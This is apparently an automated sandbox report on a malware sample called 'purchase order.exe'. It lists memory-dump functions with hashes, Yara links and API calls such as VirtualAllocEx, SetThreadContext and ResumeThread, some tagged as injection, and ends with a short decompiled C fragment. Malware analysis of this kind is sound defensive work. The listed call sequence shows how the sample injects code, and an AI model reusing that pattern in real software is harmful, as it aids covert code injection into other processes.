                                                      • Opcode ID: 8f3bef4686ba7c10d03744183c3ee8689d56342cd3729c7455b093dba5553a18
                                                      • Instruction ID: f267e16b32df04321f70b55df803694ded11c34444101f4d488a227afca88473
                                                      • Opcode Fuzzy Hash: 8f3bef4686ba7c10d03744183c3ee8689d56342cd3729c7455b093dba5553a18
                                                      • Instruction Fuzzy Hash: D34165B9D042589FDF00CFA9D984ADEBBF5BB09310F14906AE918BB310D335A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B18778, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B18843
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID: A8y&
                                                      • API String ID: 3793708945-73667374
                                                      • Opcode ID: 316d58ea1a22442e3a9ad72281aaa5b6d48a0efaddc76c1fe04468706f809d7c
                                                      • Instruction ID: b77f8d2481f0cdb1d84470f2bed724fcb4cde7334d46fe91ad38c4e27924e838
                                                      • Opcode Fuzzy Hash: 316d58ea1a22442e3a9ad72281aaa5b6d48a0efaddc76c1fe04468706f809d7c
                                                      • Instruction Fuzzy Hash: 414166B9D002589FDF00CFA9D984ADEBBF5BB09310F14906AE918BB310D335A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AE5E8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 063AE69A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID: A8y&
                                                      • API String ID: 1726664587-73667374
                                                      • Opcode ID: be6968d3f1facdf77177d779b4762a26007c77da1c92454c66137503e1e6e271
                                                      • Instruction ID: 9d298dd31509fcb1c9e6d8b1549b1d033e72e40e62b54b705a96d683cfcf98ea
                                                      • Opcode Fuzzy Hash: be6968d3f1facdf77177d779b4762a26007c77da1c92454c66137503e1e6e271
                                                      • Instruction Fuzzy Hash: 2041A8B4D042589FCF10CFAAD884AEEFBB1BB09320F10942AE914B7310D734A945DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AE310, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063AE3BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: A8y&
                                                      • API String ID: 4275171209-73667374
                                                      • Opcode ID: 2f869a6f333310443ab57f5fbb799b6bd0655ec60edbd509dedf4c43d19f8681
                                                      • Instruction ID: 6e8e3ea0242ad21482671b2df1099a074961b4c807b72d796df36fd8c015a4a1
                                                      • Opcode Fuzzy Hash: 2f869a6f333310443ab57f5fbb799b6bd0655ec60edbd509dedf4c43d19f8681
                                                      • Instruction Fuzzy Hash: A93197B8D042589FCF10CFA9E884ADEBBB5BB49310F10942AE815B7310D734A906DFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1C9F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(?,?,?), ref: 02B1DB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&
                                                      • API String ID: 1029625771-73667374
                                                      • Opcode ID: af7090955b648187e1de18595ad879fa910c0ce2a6c382027b4a21539a0992b1
                                                      • Instruction ID: 1cf316a512b65b5f0c8c77d216c29fada8684f277633f27d42027ca062e4d9e2
                                                      • Opcode Fuzzy Hash: af7090955b648187e1de18595ad879fa910c0ce2a6c382027b4a21539a0992b1
                                                      • Instruction Fuzzy Hash: 6E4196B4E042599FCF14CFA9D884A9EFBF0BB49314F14906AE919B7310D334A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1DAA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(?,?,?), ref: 02B1DB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&
                                                      • API String ID: 1029625771-73667374
                                                      • Opcode ID: dc818b0604ca539b4685d1e0138b9dae4449f992eefefdfc50389c9f83f2452a
                                                      • Instruction ID: d6ad0e5de14a5bffb300e4bc8ac86b40e382415601a5ac985042eafeea9329a6
                                                      • Opcode Fuzzy Hash: dc818b0604ca539b4685d1e0138b9dae4449f992eefefdfc50389c9f83f2452a
                                                      • Instruction Fuzzy Hash: 434196B9D012599FCB10CFA9D984A9EFBF0BB09314F14906AE818B7210D334A946CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AE128, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,?), ref: 063AE1D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID: A8y&
                                                      • API String ID: 1591575202-73667374
                                                      • Opcode ID: 624784bfbdbcb0ad95891aca34ecdef884edfcd68f65e62a27b01f828eec44c8
                                                      • Instruction ID: efd8a4fe8eb40502c26eb9584e6c94be750513655040f5e3a72a7765dad58528
                                                      • Opcode Fuzzy Hash: 624784bfbdbcb0ad95891aca34ecdef884edfcd68f65e62a27b01f828eec44c8
                                                      • Instruction Fuzzy Hash: 2F31DBB4D012589FDB14DFAAD884AEEFBF0BF48314F14802AE414B7200D738A949DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2C240, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,00000000), ref: 06A2C2E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID: A8y&
                                                      • API String ID: 410705778-73667374
                                                      • Opcode ID: 6f5fbd6b16751d8f9be1dfbfba01863648a399ce8e5228a7e857e038df03939b
                                                      • Instruction ID: 681e791889bb9560e7f4f00644ab96f7599a8c1ed44be0958bc814dae59a5f5e
                                                      • Opcode Fuzzy Hash: 6f5fbd6b16751d8f9be1dfbfba01863648a399ce8e5228a7e857e038df03939b
                                                      • Instruction Fuzzy Hash: 003188B9D012589FCB10CFA9D984ADEFBF4BB49320F14906AE815BB310D735A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A27BD8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,00000000), ref: 06A2C2E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID: A8y&
                                                      • API String ID: 410705778-73667374
                                                      • Opcode ID: 64f13869321b3b8cdeda0ef8010e9ed58757c57849ca2f11c8fb3c1cf1e7c970
                                                      • Instruction ID: b7c25144e2f977050fb84c551cf5c3194c26a4dd49ac47eefe8121cc85c09a2b
                                                      • Opcode Fuzzy Hash: 64f13869321b3b8cdeda0ef8010e9ed58757c57849ca2f11c8fb3c1cf1e7c970
                                                      • Instruction Fuzzy Hash: A3318AB8D052589FCB50DFA9D484ADEFBF4BB09320F14905AE815B7310D774A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B11601, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OutputDebugStringW.KERNELBASE(?), ref: 02B116A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DebugOutputString
                                                      • String ID: A8y&
                                                      • API String ID: 1166629820-73667374
                                                      • Opcode ID: 9ea30c99aaddae324b6221d2a44bf717433342afab786afa3b7a3c458ef264ad
                                                      • Instruction ID: 6b2a336208b0ecff62b6113817d4a8e9692dea68a6526853bb2ff1396c782707
                                                      • Opcode Fuzzy Hash: 9ea30c99aaddae324b6221d2a44bf717433342afab786afa3b7a3c458ef264ad
                                                      • Instruction Fuzzy Hash: 3A318AB4D012589FCB14CFA9D584ADEFBF1AF49314F14806AE818B7220D735A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B11608, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OutputDebugStringW.KERNELBASE(?), ref: 02B116A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DebugOutputString
                                                      • String ID: A8y&
                                                      • API String ID: 1166629820-73667374
                                                      • Opcode ID: d6fb09229ef7972a9971ca7215ef28b75c2f8e251900be0ebdfc0db987369f95
                                                      • Instruction ID: ad92f18e77a755c4af95dde1e54f7eaec86d3b724eff0484513db37549ef27a9
                                                      • Opcode Fuzzy Hash: d6fb09229ef7972a9971ca7215ef28b75c2f8e251900be0ebdfc0db987369f95
                                                      • Instruction Fuzzy Hash: C531B9B4D012089FCB14CFAAD984ADEFBF5AF49314F18806AE818B7320D734A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1D798, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(?), ref: 02B1D82A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID: A8y&
                                                      • API String ID: 4139908857-73667374
                                                      • Opcode ID: ec7dd6e84de2c3787983cfe20b1e345d9621a0360114d7790831b223e9f12544
                                                      • Instruction ID: 32f5587ca873f9b59619d04d7c403db67af729a5ed265406d55f42ca42c8e601
                                                      • Opcode Fuzzy Hash: ec7dd6e84de2c3787983cfe20b1e345d9621a0360114d7790831b223e9f12544
                                                      • Instruction Fuzzy Hash: 6C3199B4D002599FCB14CFAAD884ADEFBF5AB49314F14906AE818B7320D334A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B11738, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 02B117BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 62d444b54d71506d485c2077bfa5b927441ebb879eb6e0493fd85af6b2d3954f
                                                      • Instruction ID: 439e0850c625ec0dfab789b0d144c484081d7b4ef015fa720c8ea5a688e33584
                                                      • Opcode Fuzzy Hash: 62d444b54d71506d485c2077bfa5b927441ebb879eb6e0493fd85af6b2d3954f
                                                      • Instruction Fuzzy Hash: 2D31ACB9D002189FCB10CFA9E484AEEFBF4AF49324F14905AE918B7310C334A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063AE008, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 063AE086
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID: A8y&
                                                      • API String ID: 947044025-73667374
                                                      • Opcode ID: f1f32b076025f369e7379b79c580d04966364c918995415a6a857833d66d62bd
                                                      • Instruction ID: a4f99d684c78761c89fb92ec01de30c4f59a9e51078f206d90f1aa5dafbc4a58
                                                      • Opcode Fuzzy Hash: f1f32b076025f369e7379b79c580d04966364c918995415a6a857833d66d62bd
                                                      • Instruction Fuzzy Hash: 6E31ACB4D052189FDF14DFAAD884ADEFBB4EB49314F14942AE815B7300CB35A905CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B11740, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 02B117BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 3cf655144cfa0459fbaf60dfe6ecdd85f251d47fb7e07072ec06283f702bf4c0
                                                      • Instruction ID: 86ab28952e8ba1936b23da5a25a360496c7f9fa0cfae1f35f7e305856b0416b0
                                                      • Opcode Fuzzy Hash: 3cf655144cfa0459fbaf60dfe6ecdd85f251d47fb7e07072ec06283f702bf4c0
                                                      • Instruction Fuzzy Hash: 0B21AEB5D042589FCB10CFA9D484AEEFBF4AF49324F14905AE914B7310D734A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2D340, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 06A2D3BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 6a0f26c51da6b2ea113d56c674bb42f30c14dc396c4d1fc466235fac76dd3240
                                                      • Instruction ID: 79a8ae88a54bfe4aa7d9d0ab48d9e374c0387abbd4c18cf02e67574428234db3
                                                      • Opcode Fuzzy Hash: 6a0f26c51da6b2ea113d56c674bb42f30c14dc396c4d1fc466235fac76dd3240
                                                      • Instruction Fuzzy Hash: 6B31BBB9D002599FDB10DFA9D584ADEFBF0AF08324F25805AE854B7311D334AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A2D348, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 06A2D3BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID: A8y&
                                                      • API String ID: 2591292051-73667374
                                                      • Opcode ID: 1a93e40f8c722cf3d782b49a7e5514e3575c9d31434cd17c3f47851d164d2876
                                                      • Instruction ID: 965042fdab395077fa2bc31903016eaa8a38337804ee912b5ad49246f75b0b67
                                                      • Opcode Fuzzy Hash: 1a93e40f8c722cf3d782b49a7e5514e3575c9d31434cd17c3f47851d164d2876
                                                      • Instruction Fuzzy Hash: 173199B5D002199FDB10DFA9D484ADEFBF4AB48324F24805AE815B7310D374AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0116D3EC, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.354824214.000000000116D000.00000040.00000001.sdmp, Offset: 0116D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ee27cf104edea75b4a37abc78aae0ac33debd2b71e1057a2de44b0aef92f71e
                                                      • Instruction ID: 813af2789a7d92a4ecdd23f21de6ea6aeae44b829ee449b6958bf9b5ecf1f3fd
                                                      • Opcode Fuzzy Hash: 8ee27cf104edea75b4a37abc78aae0ac33debd2b71e1057a2de44b0aef92f71e
                                                      • Instruction Fuzzy Hash: BE2136B1604200EFDF09DF54E8C0B66BB69FB84324F24C568E9494B606C337E866C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0117D01C, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.354835783.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2db6a85c6a36de91b7512404e4404da1988c91bd1e7c319af24b643c4ec8797
                                                      • Instruction ID: b34aff852a415ea91f2dac06b90e35742c0be9a01955a8433f4ca43d5a5c33f9
                                                      • Opcode Fuzzy Hash: b2db6a85c6a36de91b7512404e4404da1988c91bd1e7c319af24b643c4ec8797
                                                      • Instruction Fuzzy Hash: D721F171504208AFDF1ADF54E9C0B16BB75EB84254F24C5A9E9094B346C736D846CA62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0117D006, Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.354835783.000000000117D000.00000040.00000001.sdmp, Offset: 0117D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fa9e5b75ca8b49b6e5a5da45c91b8ae6220fce9f5293434f323f9ee6a443949
                                                      • Instruction ID: 7dd3794f064ccc48375579e546c09d49359c8b460322c8fd6c648161ad2c5566
                                                      • Opcode Fuzzy Hash: 8fa9e5b75ca8b49b6e5a5da45c91b8ae6220fce9f5293434f323f9ee6a443949
                                                      • Instruction Fuzzy Hash: BE21CF354083848FCB07CF24D990B15BF71EF46214F28C1EAC8488B2A7C33AD80ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0116D3E7, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.354824214.000000000116D000.00000040.00000001.sdmp, Offset: 0116D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51ec13b725027092ed1aa9eddd4cc34221202fdb6ccf77713265fee64c56290e
                                                      • Instruction ID: ab5cdaa513de8c7d163d9add2cfbaaf7775a12f1568ec481376ef95bfb14c361
                                                      • Opcode Fuzzy Hash: 51ec13b725027092ed1aa9eddd4cc34221202fdb6ccf77713265fee64c56290e
                                                      • Instruction Fuzzy Hash: A411B476504280DFCF16CF54D5C4B56BF72FB84324F24C5A9D8484B656C336E866CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 06A24F20, Relevance: 2.9, Strings: 2, Instructions: 354COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: f44fbc0da63e28e094292d60f41bf4e9af3c81358aa2eb6911c92aa8b715d23a
                                                      • Instruction ID: 210a057106f5542fd183276054fafbcd47b407699a4b8aed2ce7afefee127742
                                                      • Opcode Fuzzy Hash: f44fbc0da63e28e094292d60f41bf4e9af3c81358aa2eb6911c92aa8b715d23a
                                                      • Instruction Fuzzy Hash: C0E1E370E04229CFDB64DFA9C880BDDFBB1BF49304F1091A9D819AB290DB749985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A21CEC, Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 103096c6b7b8e3364f9a0d7a2655478a4ba3f371dbafe7a0db6df47b8d16ae28
                                                      • Instruction ID: b50033694d2a00ca4ae14526cc4563415af71d71220eaa928659417233f648c8
                                                      • Opcode Fuzzy Hash: 103096c6b7b8e3364f9a0d7a2655478a4ba3f371dbafe7a0db6df47b8d16ae28
                                                      • Instruction Fuzzy Hash: 8D4110B4D00259DFDB54DFA9D984BEEBBF1BB0A314F248129E814AB350D7749885CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06A21CF8, Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 6dca8491ed1e26171fae59dd9a5947cada9258a78e36d6161768b54c030bb45b
                                                      • Instruction ID: e186dcd0371b11ac4348f57ba266c9fbaf5975062cd5d2ae0dc4423065fe2c56
                                                      • Opcode Fuzzy Hash: 6dca8491ed1e26171fae59dd9a5947cada9258a78e36d6161768b54c030bb45b
                                                      • Instruction Fuzzy Hash: BD41FDB4D00259DFDB54DFA9D984BAEFBF1BB4A314F208129E814BB240D7749885CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063ABED8, Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 8ddefde924596a45079c5653c3df9bad911dee1ee075ebfdf8ac25e2a97339c5
                                                      • Instruction ID: 14f197f1e6d3c29ac01a1ef1e920fba7ec3c3b32520eced1e669c42dc65ebf08
                                                      • Opcode Fuzzy Hash: 8ddefde924596a45079c5653c3df9bad911dee1ee075ebfdf8ac25e2a97339c5
                                                      • Instruction Fuzzy Hash: 6A12CC74E102188FDB54CFA9C984AEDFBF2FF88304F1491A9E809A7255D7349986DF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A0040, Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2363233923
                                                      • Opcode ID: 679d794066a93bd4c825416714a306fc2fa1abb2ac4ed36926215a2a6eca732e
                                                      • Instruction ID: a354be91089c233364c43db729170d3534b51e64465c1d2de92560a5307a2fcb
                                                      • Opcode Fuzzy Hash: 679d794066a93bd4c825416714a306fc2fa1abb2ac4ed36926215a2a6eca732e
                                                      • Instruction Fuzzy Hash: 00414EB1E056588BEB6CCF6BCD4078EFAF7AFC9200F04C5BA850CAA255DB7009858F55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A6520, Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n
                                                      • API String ID: 0-2013832146
                                                      • Opcode ID: 8dd997d58bed3a3fb4f0b66339d28421169b1c8004f81e3c892163eda92dbff5
                                                      • Instruction ID: 8c74d6f4698b1dbe4b2302465c44d0f4a099e2ec387a3e270cf1f9b97bebd945
                                                      • Opcode Fuzzy Hash: 8dd997d58bed3a3fb4f0b66339d28421169b1c8004f81e3c892163eda92dbff5
                                                      • Instruction Fuzzy Hash: 39312571E05758CBE75DCF6B8D4568EFAF7AFC9200F18C1B9840CAA264DB3006469F55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1DD90, Relevance: .5, Instructions: 523COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bcd06fabdb6bafdd82da51d5ffdd6bd0b6ae330fb00d8620ed6c43077aff9f3f
                                                      • Instruction ID: de5e854111ee5746b25fc88fe8d4f79e3bbb685320d4620885fd50acc3527b2e
                                                      • Opcode Fuzzy Hash: bcd06fabdb6bafdd82da51d5ffdd6bd0b6ae330fb00d8620ed6c43077aff9f3f
                                                      • Instruction Fuzzy Hash: 98528CB1D80706CFD712CF58E8886997BB1FB41398F948A18D1A15B3D0E3F965AACF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 02B1ACF0, Relevance: .3, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b01f418dcd392bac812a96c86e916c9ff117b2c6b77e7efac3947c68eac7601d
                                                      • Instruction ID: b03c9dac1ab2888746d07364d3c3735d6ec61fb8c87d4cca4eb9e9b6fea9899c
                                                      • Opcode Fuzzy Hash: b01f418dcd392bac812a96c86e916c9ff117b2c6b77e7efac3947c68eac7601d
                                                      • Instruction Fuzzy Hash: B9A18036E102198FCF05DFA5C8845EEBBB2FF85300B5585AAE905BB260EB31E945CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063A650F, Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc5acfa8963d204dacef72bf59981ecf047faec12718201a810c3a1cf686a4ad
                                                      • Instruction ID: ba0e03c8873fa3fb36be17d5dd50a1d860022dd90b8ded98387ca8a7a2d3ca09
                                                      • Opcode Fuzzy Hash: fc5acfa8963d204dacef72bf59981ecf047faec12718201a810c3a1cf686a4ad
                                                      • Instruction Fuzzy Hash: 933133B1E056188BEB5DCF6B8D4168EFAF7AFC9200F18C1B9950CAA258DB3016468F55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: purchase order.exe PID: 4672 Parent PID: 3900 purchase order.exeCOMMON

                                                      Executed Functions

                                                      Function 00419FCA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E00419FCA(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t19;
				void* _t28;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				asm("fst dword [ebp-0x75]");
				_t14 = _a4;
				_t30 = _a4 + 0xc48;
				E0041AB20(_t28, _t14, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a, _t29);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t32); // executed
				return _t19;
			}








                                                      0x00419fcf
                                                      0x00419fd3
                                                      0x00419fdf
                                                      0x00419fe7
                                                      0x00419ff2
                                                      0x0041a00d
